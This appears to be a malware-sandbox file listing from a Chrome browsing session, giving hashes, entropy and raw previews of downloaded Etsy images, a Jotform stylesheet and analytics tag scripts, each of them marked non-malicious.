                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0......................................................................!................................................................!......X.X.."..........;..........................................................................%...Y:..3...MJ..2b.8..:>.......&..h..Ou`p..U.#g.R.r.6...d8..u.g.X..0.Rz..K..2...p.{..0F....+.4DW.i..^.G`E.*(....,.;.4RW.4H"/.PXc}...+......{.c.u....c..8.Hk..'......o...r.l...[..E7...UB...8h1.LP.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):22849
                                                                                                                                                                              Entropy (8bit):4.931639406599458
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:C6E903971EA447C3F93C6CA50E53F720
                                                                                                                                                                              SHA1:62CAE431C169858655C5C402C6D407232BECFF25
                                                                                                                                                                              SHA-256:ADA4D0A561DDCD8909FA775BB11E32327C27D1B688C7251F46BB3304ACF43F7B
                                                                                                                                                                              SHA-512:2C36BA3A0A83C817E3625BA3512AF8AC295EB1F1A84EC40D5332B9B6316C83799AC83F4C64AED2C4C0E1E5E4B17F35C32D390FD41EA052D00B8920EE5A9DE289
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://cdn01.jotfor.ms/css/styles/payment/payment_feature.css?3.3.57813
                                                                                                                                                                              Preview:/* stylelint-disable */../* PAYMENT FEATURES CSS */../* filter-container start */./* When we enable search category and and sort */./*.p-filter-one-column if enable only one of them we are adding that class to label */./*.p-filter-two-column if enable two of them we are adding that class to label */./*.p-filter-three-column if enable three of them we are adding that class to label */...filter-container {. display: flex;. justify-content: flex-end;. width:100%;. margin-bottom: 12px;.}..filter-container .select-area,..filter-container #productSearch-input {. background-color: #F9F9FF;. border-color: #E0E6F0;.}..#productSearch-input,.#payment-category-dropdown .select-area,.#payment-sorting-products-dropdown .select-area {. height: 40px;. display: flex;. width: 100%;. align-items: center;. border-width: 1px;. border-style: solid;. font-size: 15px;. background-repeat: no-repeat;.}.#productSearch-input {. padding: 0 22px 0 8px;. background-im
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):30542
                                                                                                                                                                              Entropy (8bit):7.990209430648138
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:90D2CAE8A488DA805BD03DD544D3DDB2
                                                                                                                                                                              SHA1:A834A71ECDC632934EF1321C1778D5B90B829B7E
                                                                                                                                                                              SHA-256:ECA513B06F113F17735DE6EF2905447877AA6546BF87F09B052B19BE66306DBE
                                                                                                                                                                              SHA-512:AD105D02246A3428EAA679B45FD394FD93AD68CEA908376431AA31CB6E818ACBB5E7E5DB268FEDEA3EDA4641B6843ED89F1DC92520D89F880F16D4E68B1E5848
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/20631157/r/il/529e7b/6129084842/il_340x270.6129084842_hlup.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@..................v@...#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......T........pixi............ipma.................vHmdat....."*p...h4 2......E.Q@.J...........w+y...._....X....<.p.O..O..#.....|.-i.n;.+`.'..n.r..c..p.<.Fkk...o]Nt.X.y....../....Uh..p.F.[J..{..6.@*.......%.........k......L....G...P.!..pS...>.S..Gi.....U..(..!.pt.Q...2w........;.S@.......E7..jL...F...<...{.....n..|.....9....U.M...!.2[.7b.N.N:}......6zHZ.=#g....]Q...D..L(.k...M..P...a.....p.f...M[..7hu..%..K.....+....9.3../...R=.......H....gd.s.o2.zZ.v.-.b.`T.PQ.7....w.=a..~.q....F..&.d.E..$....O..,.>....-+.u..0m..y..D....c?..7.#+.....T..QT....:...maKK}v.l....0.u...oI....;..a.i..XL..w..i...../?.....L.9...3...ac.sn..q.+......d`.......:...A...K..R...~.....&..Nw...a#.-)..#A.........8b.O=..d..>o....4q..+._._.qY.{W`.N.+..Y.x..y..K..m..>.~Y/,l....
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):103744
                                                                                                                                                                              Entropy (8bit):7.972590589158659
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:929167ACBE5B317A381A6D61F01EB70E
                                                                                                                                                                              SHA1:5743837C4E60C7FCDCC2F75AC6BC77CA817DFE71
                                                                                                                                                                              SHA-256:3FDD687CEF55979BECC6229F7A561D7487D24347A21B8A7D56E36D8BAB56E6F5
                                                                                                                                                                              SHA-512:5CE33AD24BE4DBE9E0669DC4F0D8A78B51FAA439800878889C66AB3627E7CCAB6341DB70AD255ADF1F1D00B66D49705933DBE6E3F58712327185420346751CE2
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C.................................................."..."*%%*424DD\...C.................................................."..."*%%*424DD\......X.X.."........................................P.........................!1A.."Q2aq.#B....R..3b..$r.....C.%4S....5c&Dst.....................................;......................!..1AQ."aq.2...BR.#3r...b...$4.S..............?.......p9........ ..<V...W..y.ds.1....?H...G5...4.....@...`{c5.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):2258
                                                                                                                                                                              Entropy (8bit):7.718816642156426
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:9C7A3C4AD8EE91BE6F7C09360D5FCDF5
                                                                                                                                                                              SHA1:29C9A8297C44F32CED92050E474AE28ACF34ED97
                                                                                                                                                                              SHA-256:33143EE9699A1ED4085EA4E6BFE2A71C58B97129190DD395266937DC11F66E1B
                                                                                                                                                                              SHA-512:7DD2332BEC8C4F73037CD76AF6884FC59C486B5DDACA9978733F416E0EB2FFFED7E185C7816DBA6569BD39AF267B06D226713179C944EE0C66BE6AC5850BD1C1
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/23307389/r/il/484012/6173499711/il_100x100.6173499711_letj.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@.......................#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......d...d....pixi............ipma...................mdat........`...B2...P...A@...{.6.V...U....duk6..T.s..@....D..>......&..%..V.F*........)..`H!..3C;.{Tt....p.fK..%R.t.gM.F...e..L...;.....[.WM^3.5..:.....Q1......9.yt.O.x$*.8-g......&....R..2.Sv...F.4.'..M..Y{.h...@}....z......f.......O.ND..x.y..v..$R....[..cS.....Q...?..S@..B. .RN..8.....8.[..y....K...u..3o.m.].A..*m...%b`...H..X8.J....f.$..j.7..s.^"....~.H@..1c..H..b0]C....IR....o.T.h...z.,.w.'.h..A!...^...3j.b^n`..7..q.....=F"...{O..2.\-$.b./.LOKl........ER!...A-.B..[.R.3...\6.\OK 5/..q...x.......c ..f....x...,B.z.(<;..N...R.....6....Q.^...&.....t#5..........5..:..K.......7...^..J.ve.8..-..[..<(1.iuF....&.@Z.v....L.x..c.F.W..Y.=<.8.....Fq.i.5.....<..q..7gCvhOh.`!....m.R.n,9...gb........t.[..
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):78840
                                                                                                                                                                              Entropy (8bit):7.995460422001969
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:867213C0406031DF881A49AFD211CCB3
                                                                                                                                                                              SHA1:92FBF005C5F891702D38A2FED7D324CBB5A7DDBF
                                                                                                                                                                              SHA-256:FCF095F4166140674848038C3D61AB9455953B65B6E8B41A1386BF6AC80A0A01
                                                                                                                                                                              SHA-512:2933CD8C3499EC1CF6622C2D0572B06F9285C06095C1CADA107DD79ABB9629F40772AFCAA6096437D69C8712AA23573E3768D1D95E0D8ADA31A18C5D1DA1E074
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/21974513/r/il/462b37/3633067897/il_600x600.3633067897_sxw9.jpg
                                                                                                                                                                              Preview:RIFF.3..WEBPVP8X.... ...W..W..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..VP8 .1..0\...*X.X.>I..D"..!,<.`P..M..n....I.8.r]..\..p.....n...?;.M.w....=.'.....{../5?].s.7...?....a.g...........O....?......oz......?....R.a...#....t..............M...[.....O....!...=.?........S....ho.OB?......>.........f.7........s......#._.'.oY.j|k.k../...`.O..............`.u............P.3........._...z...........j~.......................o.......|..>...?........./.........e.......YB..+...f....'..1$.D|.&.Y.}.K....
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):9321
                                                                                                                                                                              Entropy (8bit):7.958271366000795
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:61520B62547AD70CFA560C5A4186AC61
                                                                                                                                                                              SHA1:EFFE0B9AD6E996905C6678B5C8F7CCFDDD399EBF
                                                                                                                                                                              SHA-256:2C969281439B5316E186F5F86D7B8FDCE4836BCAD9FCFABAA2317403A8B8853E
                                                                                                                                                                              SHA-512:07340DC8B7824728B37EB985D33A07DB803C698322766BE569D4ACBE11AD0D72406AD7C487A0395624FA22EC57CE8BBBB70F6E735DBA99725DEF43815D8E8F5B
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/47920349/r/il/d520b1/5581251639/il_340x270.5581251639_fngg.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@..................#[...#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......T........pixi............ipma.................#cmdat....."*p...h4 2.F.....q@...H..d..U':.b...^w.2N...N.......C_.W....y....5w.EJs...-k.u.<..A..MO..D.<...]..*yo0..R..@D..r.\?}....C.urM..1eIEz.....}......s7]Y.k.._.#..m...l...~.!.?.....>+L..($...*#.F.rhr......L...i...f,7..c.3.....leV..2.t~.Z....0.k....r.2......!..wn..U.%e...f.[..$.a_?.G_.gD.#....$.v...N1.....^}*h....".L'.[...`C....g...&......Fx.P<\....PH..#s7.j.......M..;.uVs^..n+.......C.9d.....<R.."^(.v.R..n<t.r.k-.........1....c.=l:..|../..._.8...L.5%Z.d..Z]3..0H..\...,=..|,i7.ft.......Q^./.V..[$.!..l..4....._....Ek.q..........."y.....U.E.b2.bU.x....&..-*..8.K...+.e.;.B.;vHk.V..%;...N.5.7..V......r.p.....<./.)....}.3n&0..F....f..A]..r..[..^..d@...yt. O...L..%R.S.......A...b.FV.:.qO.C
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (44394)
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):416319
                                                                                                                                                                              Entropy (8bit):5.564721131313548
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:5D59E2D9ADE99EEA4014AEF87F971A82
                                                                                                                                                                              SHA1:58057AE23B7AF8AAF8C44253B3C215902EA03FEF
                                                                                                                                                                              SHA-256:8B005A3E0D8FB458646D8F33160923EDA3477CA4A5FFF7D3A72AA0FE74FA1C30
                                                                                                                                                                              SHA-512:E69B2469899388D1EB1408078C2B6AE4139C56F917F4F958AFAEF7B2295FF456E7DD1195911FA2B30CBCBD2E6109FB3DC6723B4817E131138A90B2326A671672
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. . (function(w,g){w[g]=w[g]||{};. w[g].e=function(s){return eval(s);};})(window,'google_tag_manager');. .(function(){..var data = {."resource": {. "version":"613",. . "macros":[{"function":"__u","vtp_component":"HOST","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"PATH","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__v","vtp_name":"isTestTransaction","vtp_defaultValue":"","vtp_setDefaultValue":true,"vtp_dataLayerVersion":1},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"isDeadReceipt"},{"function":"__v","vtp_name":"transactionId","vtp_dataLayerVersion":1},{"function":"__e"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":true,"vtp_defaultValue":["macro",4],"vtp_name":["template",["macro",5],".transactionId"]},{"function":"__jsm","vtp_javascript":["template","(function(){return "
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:C source, ASCII text, with very long lines (10929)
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):10989
                                                                                                                                                                              Entropy (8bit):5.559075484568474
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:D67EFF6F3E47FC2AB88094F79EEDD741
                                                                                                                                                                              SHA1:7217356BF2E5E93013AC6902CB138FA3702C07C8
                                                                                                                                                                              SHA-256:CC801CE0C56B23A865F8DB45353F3D6B22B4A29C3728CF05D4634E181CBED937
                                                                                                                                                                              SHA-512:DF92FDB1C615F8E12CF7E32B2EF36E3DCD04C20CA438C3E1B3DC0446A3CD4DF8EFAE313EF650847B0CB511361CFCD09718E3FD8BA6C18B36BB380EE0DEF96FE2
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://resources.xg4ken.com/js/v2/ktag.js?tid=KT-N3B63-3EB
                                                                                                                                                                              Preview:/* ktag.js - 2024-09-23 */.var Ktag_Constants=function(){return{KENSHOO_GCLID_NAME:"ken_gclid",GOOGLE_ADS_CLICK_PARAM_NAME:"_gac",GOOGLE_CLICK_ID_PARAM_NAME:"gclid",BING_CLICK_ID_PARAM_NAME:"msclkid",NO_PUBLISHER_CLICK_ID_PARAM_NAME:"npclid",AMP_CHANNEL_CLICK_ID_COOKIE_NAME:"ken_amp_gclid",AMP_LINKER_PARAM_NAME:"linker",UNIVERSAL_CHANNEL_PARAM_NAME:"kclid",UNIVERSAL_CHANNEL_COOKIE_NAME:"ken_uc",KPID_NAME:"kenpid",GBRAID_NAME:"gbraid",WBRAID_NAME:"wbraid",KENSHOO_GBRAID_NAME:"ken_gbraid",KENSHOO_WBRAID_NAME:"ken_wbraid",KENSHOO_PID_NAME:"ken_pid",KENSHOO_UUID_NAME:"ken_uuid"}}(),Ktag_Toggles=function(){return{isParseAmpLinkerParameters:function(){return!1},isUseNpclid:function(){return!0},isSupportFloodlightTag:function(){return!1},getFixelId:function(){return""},isDummyEnabled:function(){return!0},isDummyDisabled:function(){return!1},isDummyEnabledForDummyTids:function(){return!1},isDummyDisabledForDummyTids:function(){return!0},getDummyString:function(){return"Hello"},getDummyNumber:f
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):65952
                                                                                                                                                                              Entropy (8bit):7.954238406985726
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:535D97FB608CAAB646F6E0D2859D07E7
                                                                                                                                                                              SHA1:E6E144ABB5B583EAD5B327EB7F505B8DC7765BE8
                                                                                                                                                                              SHA-256:CC8658A91599F67FD7402F08720B9A76832FB78047628A2D791EC71824731B81
                                                                                                                                                                              SHA-512:002CA8893A09FDE09A876BE256B5D226EAB125EE2750AA27B36DA10588E963E06E2084D6093CDB0E448A5B9DBA8CA88EECF476A495BBA705856664CB1C5296B4
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd......X.X..".........................................B......................!.1.AQa.."q.2..#B....R..b...3r...$SC.%&c.................................8.......................!1..AQ."aq....2.#BR..3r..S.$Cbs............?..].BuF..#.F..`".G.4..h.[~k..+..Ft..D).....'h.z1(.....nB..[Y;.A.......$.9..ho
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):42619
                                                                                                                                                                              Entropy (8bit):7.994181999105162
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:FD061DB8A4C36AF9075CB740B6FB794A
                                                                                                                                                                              SHA1:8BD5AAD651DA2CF9CA3D8E6D2CFEB72CBCC6FE85
                                                                                                                                                                              SHA-256:9941B5642FC99684E5EA3E0263C7879846B12576B04A2E96720E9907A3D52A52
                                                                                                                                                                              SHA-512:5E00E36A358975D7562FB2CFA958EE238E5884C7CF7F85E877403044D046E871DF999F9C58ADDBA366179E85AB4F109422C7066CF9017ABD9A247EA6FA5E5509
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/6267543/r/il/077fe2/3271243073/il_600x600.3271243073_cmph.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@...................m...#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......X...X....pixi............ipma..................umdat.....&ey_.....2........1@..)..AL..yG...s:=;...|...x...O..X.U.=.b.O.q.Qft'..P...B.)...t-..LP4$DR...}...ln&ZJ....!.2..0.7.....R,=.vw...o.6c.....4....B.w.....'..(......i..p.R...._@`./..'S.,...X.@.4.,.dC.a..(...W..2.8..).F.@..P.|...) .6c.5..=.q......c'.....[...T.P..$>..P.m.k.D..}4..z8.A........rz......x.4.... .~].J8U....G...a..%.v.,Z....L...s....GNc.L.\......o....M.[w........l|.y.cac.%...Ii...........?....Yi..9.<...M}.{..V.."..{.Z..a..;A`s.......~weCZ..&...t. F.DA.u...CH8.~.b..a.....>{..#.W..G.k.F..0uz..3..O....\.Qz...,.U.$T.}O'..j:....n.Z....}.D....j:y.&.B.3...a..J.X..g%.u..W..$$.M._K....u...43.j..7..............!..|.j.a.M.qV%&...#......T..2bi}.X`.V.Uv"..<MV..`[......j.G..'@..L.F9.#.9.....
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 170x135, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):8559
                                                                                                                                                                              Entropy (8bit):7.833105227595329
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:3138E51BDF2629B8B51132860C70124E
                                                                                                                                                                              SHA1:A08B504E95B521F4D6513D8204ECB4785C54ADFB
                                                                                                                                                                              SHA-256:622EB0FBB58BF554A52A005AE02D1AB76858F3791A643C8B4150D6FB8536747D
                                                                                                                                                                              SHA-512:AC69981F679F0A32B79BFBAC474058FF1B30F4CD36E2694F7E9E2D5ECA0ADE26D7773BEAF1098489651CE49FC9ADE95A7B75530B059CEFF970DA15AAB32B6C11
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd..........."........................................C.........................!.1.AQ."aq..2....#BR...$3Sbr....4s...................................1........................!1AQ."qa..2....#B.R.r..............?....V......L.c..n<..T..nm.C#.....|>.h......!$...0>4..Qyc`!T#...c...Vv.`..4.../..5tr..$X.';
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):8574
                                                                                                                                                                              Entropy (8bit):7.954322712204531
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:AEDADCFD68FBC95A30037CE94ADA6F71
                                                                                                                                                                              SHA1:DCC4E5B0BCF3077A60FB9A3FF5242FD06BDF6EAD
                                                                                                                                                                              SHA-256:982E5DBCCC0C23631B8D2044D248B231C7D61E5610B8F278076532FA880D5043
                                                                                                                                                                              SHA-512:1E049B5AF51216275E2F2F4C0F6E372A9677856ED6A4573A27A5977E9B1D98505BC3247E7FE6628F8D90CCF74DA52A8E2CDB0F664884DB2D5EB8E02A9BAC6F57
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/5533102/r/il/fa2faa/6104284395/il_300x300.6104284395_rbmu.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@.................. p...#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......,...,....pixi............ipma................. xmdat....."%r...h4 2.@DH.A..P......B......|.6+G...l.?.T.-rj..q.+.Zw......\...l.lf.....mN..kuM.s#0{,..5..x....;.h...{..7...S...-$'.W.g...l8...L...t...>Lv....b<t~.'.V...S}].+.q.......!..^..sIx.X.e...y..&.0C..A.....D..y..#..E.B....a|<..%;.5Emu...Y.P....P2..Q{. .......s..{c0.oj.Z.`@.9..CP"iy..q.(..R.,T...>?.:..O.....4..(#.a..!i.2].......` ..E0......_..w.#....q"...dm.....3.9.....9....3.....:..9..j.>f:.uq>.H.)pZ!..i...j.*.....K..)Uc..n.>..I>..?.N{.8..2.v.G<-^...D....'n.......a9.Y.e..E...>.. .33._.tZqP-.I.|...........v.........:.F.'.A_....b...I....MU/...M5cv_..P..R.Sr\..!.S....=.......AP...e.k.]o.b.....3.......|...t;t....a.{...$p3v.. Y..rM...K.p..sBei5..u.~...0.Z..3..%.&..-..+.M..$J.:..0..0..D[3.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 170x135, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):4220
                                                                                                                                                                              Entropy (8bit):7.614387433274654
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:9CE8409F0C8E1EA306FEDD02A8C8FFEA
                                                                                                                                                                              SHA1:42E57551CBC1443CFE63A45EB80AD335169BC051
                                                                                                                                                                              SHA-256:8274DAA7C84E1F408FCB05FFDD17872B922AFE8AAE30307AAD99A27CE58BDD38
                                                                                                                                                                              SHA-512:3788F6E539396F13EF084EC5F4539994C94D35C1626E7205E66D4A29E2066AE154117DACD0A1A6FD3597CC7D3A4B89B732874634D39B1408D0C0B15B861E7F6A
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd..........."........................................7.........................!..1A"Qa..#q...2R......BSbc................................+........................!1Aa.Qq..".2RB...............?..D.A.*.0.T.M1.....%...... .... ..!..U!.D.....%YR..e..XHe.H&..HB. T.C...'..5Aq...K...\Ol.2h..=....i.~iZ.AN
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):6399
                                                                                                                                                                              Entropy (8bit):7.934014128128306
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:A9CDA973EE53FDD44CF5A9B4484C92B6
                                                                                                                                                                              SHA1:06B2DBC76E248855AC34170FE10ABE93BCF4D7D0
                                                                                                                                                                              SHA-256:64E16B236569D42ED2D5C12846E407BFBF0E658F1E3DA181CFE847B6995C56A3
                                                                                                                                                                              SHA-512:B78CD6F323DF6D9AB556703A86D980C33A311242A3D9D7DAF5B4C155599E0E0A3F825F1E1C5F0D173D40D24BFA670379C942AAC58992140A079491952E3C5D7B
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/18152467/r/il/e471d6/6102699276/il_170x135.6102699276_ejd5.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@.......................#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe................pixi............ipma...................mdat.......a. !..2./.....a@.I..#=P.....9...&L. ...........T..D..S"... E.._l..$O>L|......m.B..+.N.w..T.)......d.N.(*.......6o.9.Q3.e^...K.h..fEL./P.vl......1^.j.+...Q..R]o.y...bv.Jn].!0.n..@.T..:./F-Zl./..7..v..7.td.(c.X....d........HJx.J..0Y..ZPcc......lH........u.q....5../=....=.......-. ..o....<8....l..3....{..W.....=.)NS..{......TO..).V]<Z..O.}....\.\Lu.....-..aQ..`c...Z..w_....l....)...o..Gxk9..}.f..U..L..I....;..X.......MO .....rF..U..U..1G....6.hA.x.....R....x..I.....|..C...%X.`VKZ.d.Mu.;.*.9.H./5....o<.t.+}.ur%....8Z.Y.a6...(..:.K..$..................j..,.=..p&.(<...Z.=.. ..A........C..E.P......|Dl.z..|...~.H...`8..r..Y..?..\.E..;jq.W......T....OP...P..O..T.S|.21K..Z..^
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):7762
                                                                                                                                                                              Entropy (8bit):7.944051495135742
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:8821F5FBFA00B6E5B6A5C4A8170095EE
                                                                                                                                                                              SHA1:973AF46011F292FCB20F942FA5FD2D72DBAC6D69
                                                                                                                                                                              SHA-256:5D253384003F25F92409C0DA18FF53CC41B695A36BFB6CC58AECBDEC24189FC5
